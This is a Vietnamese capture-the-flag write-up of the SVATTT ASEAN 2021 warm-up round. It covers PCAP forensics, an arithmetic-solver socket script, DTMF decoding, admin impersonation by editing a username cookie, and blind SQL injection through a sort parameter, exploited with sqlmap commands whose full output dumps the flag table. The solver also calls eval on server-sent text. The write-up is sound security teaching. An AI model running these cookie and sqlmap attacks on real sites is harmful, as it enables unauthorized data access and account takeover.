# Writeup SVATTT ASEAN 2021

## Vòng khởi động

### +, MISC
#### 1. Simple For
![Đề bài Simple For](https://gcdn.pbrd.co/images/9VRQrpHxguII.png?o=1)

Bài này cho một file PCAP và yêu cầu tìm flag ở trong đó.
Mình chỉ việc mở file bằng Wireshark và export các file được gửi qua HTTP request và filter với keyword "flag", sau đó lưu và đọc file là xong.

![Export HTTP](https://gcdn.pbrd.co/images/57fmsUVUc8mz.png?o=1)

##### Flag: `ASCIS{n3tw0rk_f0r3ns1c_1s_n0t_h4rd}`

#### 2. Calculate me

![Đề bài Calculate me](https://gcdn.pbrd.co/images/aoDqtFZzVA0Z.png?o=1)

Sử dụng `nc` để kết nối tới socket:

![Đề bài Calculate me](https://gcdn.pbrd.co/images/i19ucf1Yb0FU.png?o=1)

Có thể thấy đề bài yêu cầu trả lời các phép tính được đưa ra ở phía server. Nếu trả lời đúng thì một thông báo `Correct!` xuất hiện, cùng với đó là một phép tính mới. Và các phép tính này là random không lặp lại.

Vì vậy mình có viết 1 đoạn mã nhỏ để thực hiện parse phép tính trả về phía socket server, tính toán và gửi đáp án trở lại.

```python
import socket


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('125.235.240.166', 20103))
# print(s.recv(1024).decode())
while True:
    data = s.recv(1024).decode().strip()
    print(data)
    if data:
        calc = ''
        if 'Welcome' in data:
            calc = data.split('\n\n')[1].split('=')[0]
            print(calc)
        elif 'Correct!' in data:
            calc = data.split('\n\n')[1].split('=')[0]
            print(calc)
        elif '= ?' in data:
            calc = data.split('=')[0]
            print(calc)
        elif 'flag' in data:
            exit()
        ans = int(eval(calc))
        print(ans)
        ans = (str(ans) + '\n').encode()
        s.send(ans)
        print('Send answer ->', ans.decode())
s.close()
```

Kết quả sau khi chạy:

![Kết quả](https://gcdn.pbrd.co/images/wWQ8FHnRzgyG.png?o=1)

Chạy xong script tự nhiên nhớ lại cái hồi mới chơi CTF. Đề bài tương tự như này nhưng là toán mệnh đề 🙄 ngồi tính nhẩm, viết ra giấy các thứ cho tới câu thứ 9 thì bỏ cuộc vì phép tính quá dài 😂😂

##### Flag: `ASCIS{3v3ry0n3_sh0uld_kn0w_pr0gramm1ng}`

### +, CRYPTO

#### 1. CALL ME MAYBE

![Đề bài CALL ME MAYBE](https://gcdn.pbrd.co/images/l4mPixfNHic3.png?o=1)

Đề bài yêu cầu decode đoạn mã:

```
1209-852 1209-852 1209-852 1209-852 1477-770 1209-852 1209-852 1209-852 1209-852 1336-941 1336-697 1477-770 1477-770 1477-697 1336-941 1477-697 1477-770 1336-852 1477-697 1477-697 1477-697
```

Sau khi "sợt gu gồ" thì mình biết được đây là mã DTMF, vì vậy mình sử dụng công cụ [DTMF decode](https://www.dcode.fr/dtmf-code) để giải mã và được chuỗi số: `777767777026630368333`

So sánh chuỗi số này với bàn phím điện thoại: 
```
7777 = s
6    = m
7777 = s
0    =  
2    = a
66   = n
...
```

##### Flag: `ASCIS{sms ans dmtf}`

### +, WEB

#### 1. yeuvcs

![Đề bài yeuvcs](https://gcdn.pbrd.co/images/NKNNSbb3TCHc.png?o=1)

Khi vào web tại địa chỉ được cung cấp, một trang đang nhập hiện lên và sau khi trải qua các bước đăng kí và đăng nhập -> giao diện trang web.

![giao diện](https://gcdn.pbrd.co/images/bQAtRkndLDj3.png?o=1)

Trang web cho phép tìm kiếm thông qua "keyword". Search with keyword `_` sẽ liệt kê toàn bộ `id:username`.

Tại id `7` có một username là `sonnh` có biểu thị một dấu ⭐. View-source (Ctrl + U) thì thấy rắng user này chính là `Admin`.

![View-Source](https://gcdn.pbrd.co/images/HoPV9gfgWG1I.png?o=1)

Tới đây mình chỉnh sửa key `username` trong `cookie` của trang thành `sonnh` và `F5`.

![Edit Cookie](https://gcdn.pbrd.co/images/weBNHvI1tJLN.png?o=1)

##### Flag: `ASCIS{I_cant_find_name_for_4_fl4g}`

#### 2. Hitech Shop

![Đề bài Hitech Shop](https://gcdn.pbrd.co/images/UGTVHkE8YHvC.png?o=1)

Đây là trang thương mại điện tử với chức năng search và sort sản phẩm.

Sau khi sử dụng `sqlmap` để scan thì mình phát hiện sort parameter là một blind SQLi.

Kiểm tra database name: 
> sqlmap -u http://125.235.240.166:20105/index?order=a -dbs

```
[09:36:40] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.17.10
back-end DBMS: MySQL >= 5.0.12
[09:36:40] [INFO] fetching database names
[09:36:40] [INFO] fetching number of databases
[09:36:40] [INFO] resumed: 2
[09:36:40] [INFO] resumed: information_schema
[09:36:40] [INFO] resumed: vannd
available databases [2]:
[*] information_schema
[*] vannd
```

Xem các table có trong database **vannd**: 
> sqlmap -u http://125.235.240.166:20105/index?order=a -D vannd --tables

```
[09:38:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.17.10
back-end DBMS: MySQL >= 5.0.12
[09:38:48] [INFO] fetching tables for database: 'vannd'
[09:38:48] [INFO] fetching number of tables for database 'vannd'
[09:38:48] [INFO] resumed: 2
[09:38:48] [INFO] resumed: flag
[09:38:48] [INFO] resumed: products
Database: vannd
[2 tables]
+----------+
| flag     |
| products |
+----------+
```

Các column trong table **flag**:
> sqlmap -u http://125.235.240.166:20105/index?order=a -D vannd -T flag --columns
```
[09:45:07] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.17.10
back-end DBMS: MySQL >= 5.0.12
[09:45:07] [INFO] fetching columns for table 'flag' in database 'vannd'
[09:45:07] [INFO] resumed: 1
[09:45:07] [INFO] resumed: secret
[09:45:07] [INFO] resumed: varchar(1000)
Database: vannd
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| secret | varchar(1000) |
+--------+---------------+
```

Dump giá trị của column `secret`:
> sqlmap -u http://125.235.240.166:20105/index?order=a -D vannd -T flag -C secret --dump
```
[09:09:26] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.17.10
back-end DBMS: MySQL >= 5.0.12
[09:09:26] [INFO] fetching entries of column(s) 'secret' for table 'flag' in database 'vannd'
[09:09:26] [INFO] fetching number of column(s) 'secret' entries for table 'flag' in database 'vannd'
[09:09:26] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[09:09:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
[09:13:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
1
[09:13:43] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
ASC
[09:18:26] [ERROR] invalid character detected. retrying..
IS
[09:23:30] [ERROR] invalid character detected. retrying..
{SQL_1nJecTi0n_Ba5e_0N_O
[10:12:40] [ERROR] invalid character detected. retrying..
rdeR_bY}
Database: vannd
Table: flag
[1 entry]
+---------------------------------------+
| secret                                |
+---------------------------------------+
| ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY} |
+---------------------------------------+
```

##### Flag: `ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}`
